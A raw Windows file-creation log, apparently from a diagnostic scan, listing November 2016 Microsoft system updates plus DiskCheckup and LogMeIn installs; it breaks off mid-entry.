2016-11-09 15:50 - 2016-10-22 12:35 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll 2016-11-09 15:50 - 2016-10-22 12:35 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec 2016-11-09 15:50 - 2016-10-22 12:34 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll 2016-11-09 15:50 - 2016-10-22 12:27 - 02287616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2016-11-09 15:50 - 2016-10-22 12:27 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll 2016-11-09 15:50 - 2016-10-22 12:26 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll 2016-11-09 15:50 - 2016-10-22 12:22 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll 2016-11-09 15:50 - 2016-10-22 12:21 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll 2016-11-09 15:50 - 2016-10-22 12:21 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe 2016-11-09 15:50 - 2016-10-22 12:20 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll 2016-11-09 15:50 - 2016-10-22 12:09 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll 2016-11-09 15:50 - 2016-10-22 12:04 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll 2016-11-09 15:50 - 2016-10-22 12:03 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll 2016-11-09 15:50 - 2016-10-22 11:59 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll 2016-11-09 15:50 - 2016-10-22 11:58 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll 2016-11-09 15:50 - 2016-10-22 11:56 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll 2016-11-09 15:50 - 2016-10-22 11:54 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll 2016-11-09 15:50 - 2016-10-22 11:46 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll 2016-11-09 15:50 - 2016-10-22 11:45 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2016-11-09 15:50 - 2016-10-22 11:44 - 04608000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll 2016-11-09 15:50 - 2016-10-22 11:43 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl 2016-11-09 15:50 - 2016-10-22 11:43 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll 2016-11-09 15:50 - 2016-10-22 11:30 - 13654016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2016-11-09 15:50 - 2016-10-22 11:12 - 02444800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2016-11-09 15:50 - 2016-10-22 11:09 - 01312256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2016-11-09 15:50 - 2016-10-22 11:09 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll 2016-11-09 15:50 - 2016-10-15 10:31 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll 2016-11-09 15:50 - 2016-10-15 10:31 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll 2016-11-09 15:50 - 2016-10-15 10:13 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll 2016-11-09 15:50 - 2016-10-15 10:13 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll 2016-11-09 15:50 - 2016-10-11 10:37 - 00370920 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys 2016-11-09 15:50 - 2016-10-11 10:31 - 01148416 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10.IME 2016-11-09 15:50 - 2016-10-11 10:31 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll 2016-11-09 15:50 - 2016-10-11 10:31 - 00878080 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL 2016-11-09 15:50 - 2016-10-11 10:31 - 00457216 _____ (Microsoft Corporation) C:\Windows\system32\imkr80.ime 2016-11-09 15:50 - 2016-10-11 10:31 - 00246784 _____ (Microsoft Corporation) C:\Windows\system32\input.dll 2016-11-09 15:50 - 2016-10-11 10:31 - 00176128 _____ (Microsoft Corporation) C:\Windows\system32\tintlgnt.ime 2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\quick.ime 2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\qintlgnt.ime 2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\phon.ime 2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\cintlgnt.ime 2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\chajei.ime 2016-11-09 15:50 - 2016-10-11 10:31 - 00132608 _____ (Microsoft Corporation) C:\Windows\system32\pintlgnt.ime 2016-11-09 15:50 - 2016-10-11 10:18 - 01027584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10.IME 2016-11-09 15:50 - 2016-10-11 10:18 - 00829952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll 2016-11-09 15:50 - 2016-10-11 10:18 - 00701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10K.DLL 2016-11-09 15:50 - 2016-10-11 10:18 - 00430080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imkr80.ime 2016-11-09 15:50 - 2016-10-11 10:18 - 00202240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\input.dll 2016-11-09 15:50 - 2016-10-11 10:18 - 00126976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tintlgnt.ime 2016-11-09 15:50 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quick.ime 2016-11-09 15:50 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qintlgnt.ime 2016-11-09 15:50 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\phon.ime 2016-11-09 15:50 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cintlgnt.ime 2016-11-09 15:50 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\chajei.ime 2016-11-09 15:50 - 2016-10-11 10:18 - 00090112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pintlgnt.ime 2016-11-09 15:50 - 2016-10-11 08:33 - 00187392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAnimation.dll 2016-11-09 15:50 - 2016-10-11 08:06 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\UIAnimation.dll 2016-11-09 15:50 - 2016-10-10 10:38 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys 2016-11-09 15:50 - 2016-10-10 10:38 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys 2016-11-09 15:50 - 2016-10-10 10:34 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll 2016-11-09 15:50 - 2016-10-10 10:34 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll 2016-11-09 15:50 - 2016-10-10 10:34 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll 2016-11-09 15:50 - 2016-10-10 10:34 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 01462272 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll 2016-11-09 15:50 - 2016-10-10 10:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe 2016-11-09 15:50 - 2016-10-10 09:56 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys 2016-11-09 15:50 - 2016-10-10 09:55 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys 2016-11-09 15:50 - 2016-10-10 09:55 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys 2016-11-09 15:50 - 2016-10-10 09:55 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe 2016-11-09 15:50 - 2016-10-10 09:54 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe 2016-11-09 15:50 - 2016-10-10 09:50 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll 2016-11-09 15:50 - 2016-10-07 10:40 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi 2016-11-09 15:50 - 2016-10-07 10:37 - 05547752 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe 2016-11-09 15:50 - 2016-10-07 10:37 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi 2016-11-09 15:50 - 2016-10-07 10:35 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 03649536 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00877056 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:18 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe 2016-11-09 15:50 - 2016-10-07 10:18 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe 2016-11-09 15:50 - 2016-10-07 10:15 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:04 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe 2016-11-09 15:50 - 2016-10-07 10:04 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys 2016-11-09 15:50 - 2016-10-07 10:04 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe 2016-11-09 15:50 - 2016-10-07 10:01 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe 2016-11-09 15:50 - 2016-10-07 10:00 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe 2016-11-09 15:50 - 2016-10-07 09:56 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe 2016-11-09 15:50 - 2016-10-07 09:50 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe 2016-11-09 15:50 - 2016-10-07 09:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll 2016-11-09 15:50 - 2016-10-07 09:50 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe 2016-11-09 15:50 - 2016-10-07 09:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe 2016-11-09 15:50 - 2016-10-07 09:49 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 09:49 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 09:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 09:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll 2016-11-09 15:50 - 2016-10-05 09:54 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bowser.sys 2016-11-09 15:50 - 2016-09-15 09:56 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll 2016-11-09 15:50 - 2016-09-13 10:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll 2016-11-09 15:50 - 2016-09-13 10:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll 2016-11-09 15:50 - 2016-09-09 13:20 - 00756736 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll 2016-11-09 15:50 - 2016-09-09 13:00 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll 2016-11-09 15:49 - 2016-08-22 11:19 - 01386496 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll 2016-11-08 20:20 - 2016-11-08 20:20 - 01694784 _____ (PassMark Software ) C:\Users\cjerald\Downloads\diskcheckup.exe 2016-11-08 20:20 - 2016-11-08 20:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DiskCheckup 2016-11-08 20:20 - 2016-11-08 20:20 - 00000000 ____D C:\Program Files (x86)\DiskCheckup 2016-11-08 15:54 - 2016-12-01 03:43 - 00000988 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Control Panel.lnk 2016-11-08 15:53 - 2016-11-08 15:54 - 00000000 ____D C:\Program Files (x86)\LogMeIn 2016-11-08 15:53 - 2016-11-08 15:53 - 00000000 ____D C:\Users\cjerald\AppData\Local\LogMeIn 2016-11-08 15:53 - 2016-10-12 13:31 - 00122400 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIRfsClientNP.dll 2016-11-08 15:53 - 2016-10-12 13:31 - 00107520 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIinit.dll 2016-11-08 15:53 - 2016-01-29 11:53 - 00035328 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIport.dll 2016-11-08 15:53 - 2013-12-10 15:15 - 00107368 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIRfsClientNP.dll.000.bak 2016-11-08 15:53 - 2013-11-05 16:45 - 00072216 _____ (LogMeIn, Inc.) C:\Windows\system32\Drivers\LMIRfsDriver.sys 2016-11-08 15:51 - 2016-11-08 15:51 - 20489480 _____ C:\Users\cjerald\Downloads\LogMeIn.exe 2016-11-02 10:51 - 